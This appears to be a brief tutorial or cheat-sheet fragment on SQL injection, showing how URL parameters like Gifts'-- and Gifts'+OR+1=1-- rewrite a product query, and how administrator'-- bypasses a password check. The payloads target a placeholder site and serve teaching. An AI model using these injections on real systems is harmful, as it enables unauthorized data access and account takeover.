Interfere
An attacker may interfere with the queries.
# Use comment to remove the remainder of the query
https://insecure-website.com/products?category=Gifts
# SELECT * FROM products WHERE category = 'Gifts' AND released = 1
https://insecure-website.com/products?category=Gifts'--
# SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
https://insecure-website.com/products?category=Gifts'+OR+1=1--
# SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
Bypass
An attacker can log in as any user without a password.
# SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
# SELECT * FROM users WHERE username = 'administrator'--' AND password = ''
Last update: 470 days ago
